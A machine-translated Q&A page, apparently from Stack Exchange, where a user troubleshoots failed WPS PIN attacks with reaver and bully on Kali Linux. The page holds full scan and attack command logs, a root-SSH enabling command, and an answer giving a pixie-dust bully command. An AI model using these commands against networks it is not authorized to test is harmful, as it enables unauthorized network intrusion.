web-dev-qa-db-ja.com

Kali Linuxでreaver-bullyを使用したWPSクラッキング

私のハードウェアは次のようになります。RHELを実行しているLenovoラップトップ、およびVirtual Machine ManagerがKali LinuxでVMを起動します。これらのネットワークカードを試してみました:

  • TL-WN722N
  • AWUS051NH
  • AWUS036NH

VM=ライブモードで起動し(永続ストレージは不要))、これらのネットワークカードのいずれかを一度に共有します。これらすべてで、まったく同じ結果が得られます。

最初に、これらの2行を実行して、ssh経由でアクセスできるようにし、ターミナルエクスペリエンスなどを向上させます。

$ sed -i -e 's/prohibit-password/yes/g' /etc/ssh/sshd_config
$ service ssh start

ネットワークインターフェースの設定について詳しく説明します。

root@kali:~# airmon-ng start wlan0

Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!

  PID Name   
  963 NetworkManager
 1087 dhclient
 1534 wpa_supplicant

PHY Interface   Driver      Chipset

phy0    wlan0       rt2800usb   Ralink Technology, Corp. RT3572

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) 
        (mac80211 station mode vif disabled for [phy0]wlan0)

root@kali:~# iwconfig  eth0      no wireless extensions.

wlan0mon  IEEE 802.11abgn  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
lo        no wireless extensions.

root@kali:~# ifconfig wlan0mon down 
root@kali:~# iwconfig wlan0mon mode monitor 
root@kali:~# ifconfig wlan0mon up   
root@kali:~# iwconfig eth0      no wireless extensions.

wlan0mon  IEEE 802.11abgn  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
 lo        no wireless extensions.

そしてその後、いくつかの発見:

 root@kali:~# airodump-ng wlan0mon

    BSSID    PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 XX:XX:XX:XX  -80        2        0    0   1  54e  WPA2 CCMP   MGT  NumA
 XX:XX:XX:XX  -28        2        0    0   6  54e  WPA2 CCMP   PSK  NumB 
 XX:XX:XX:XX  -81        2        0    0   11  54e  WPA2 CCMP   MGT  NumC


root@kali:~# wash -i wlan0mon    

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...


root@kali:~# wash -i wlan0mon -C

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
XX:XX       1            -73        1.0               No                WiA
XX:XX       6            -27        1.0               No                WiB
XX:XX       11            -77        1.0               No                WiC

そして今、攻撃部分:

root@kali:~# reaver -i wlan0mon -b XX:XX:XX:XX -vv       

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Waiting for beacon from XX:XX:XX:XX
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Switching wlan0mon to channel 7
[+] Switching wlan0mon to channel 8
[+] Switching wlan0mon to channel 11
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)

また、いじめっ子を使用して:

root@kali:~# bully -b XX:XX:XX wlan0mon -c 11
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'wlan0mon' to channel '11'
[!] Using 'XX:XX:XX' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'XX:XX:XX' on channel '11'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'TargetA' (XX:XX:XX)
[!] Creating new randomized pin file '/root/.bully/pins'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc'   Next pin '36490264'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '36490264'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '36490264'

私のプレイグラウンドアクセスポイントのうち少なくとも2つは、macアドレス(私が呼び出したと思われるpixie dust)に基づく攻撃に対して脆弱であることを知っています。私はいくつかの安価なAndroid no name Android phoneを使用してそれらをクラックすることに成功しました。そしてこの攻撃は私のネットワークカードの組み合わせでは機能しません/ターゲットアクセスでもありませんポイント。

欠落している構成、または欠落しているハードウェアの互換性のいずれかが必要です。

これらのネットワークカードは監視モード用であることは知っています。wpsもサポートする必要があると思いますが、まだ動作するように管理していません。 WPS攻撃を実行するために特定のものが必要ですか?

4

私はあなたにいくつかの推奨事項を持っています。

まず第一に。私が間違っていない場合は、両方のAlfaがRalinkチップセットベースです。 Ralinkチップセットとリーバーがひどい結果をもたらすことを知っている必要があります。いじめっ子を使うほうがずっといいです。

もう1つの重要なことは、-N(--no-nacks)引数を使用するリーバーです。使ってみてください。このパラメータを使用すると、順不同のパケットが受信されたときにNACKメッセージを送信しません。多分それはあなたを助けるかもしれませんが、私が私の最初のポイントで言ったように... Ralink + reaver = crapを使用します。

Pixie Dust攻撃は、特定のバージョン(Bullyの場合は1.1、Reaverの場合は1.5.2)がある場合、ReaverとBullyに直接統合できます。したがって、ログから、Reaverを使用して実行できるように見えますが、再び問題が発生します(Ralink blah blah blah ...)。だから私の提案は、いじめっ子バージョンを更新することです。 Kaliでは、リポジトリからバージョン1.1を直接入手できます。そして、次のコマンドを使用して直接実行できます。

bully wlan0mon -b XX:XX:XX:XX:XX:XX -c 11 -d -v 3

注1もちろん、pixiewpsもインストールしておく必要があります。 Kaliのaptで簡単に入手できます。リポジトリにあります。

注2いじめっ子1.1では、詳細レベルを3から4に上げることができます。これは以前のバージョンでは機能しません。

一部のAPがWPS攻撃に対して脆弱であることを確信している場合は、-p xxxxxxxxオプションを使用して直接テストできます。あなたはAPのオーナーだと思いますよね。そしてもちろん、あなたはピンを知っています。このオプションを使用して、パスワードを取得できるかどうかをテストできます。あなたが持っているソフトウェアとチップセットのどの組み合わせが問題なく動作しているかを知ることは役に立ちます。

最後の推奨事項は、いくつかのワイヤレススクリプトを試してください。私が協力しているもの airgeddon

それが役に立てば幸い!

6
OscarAkaElvis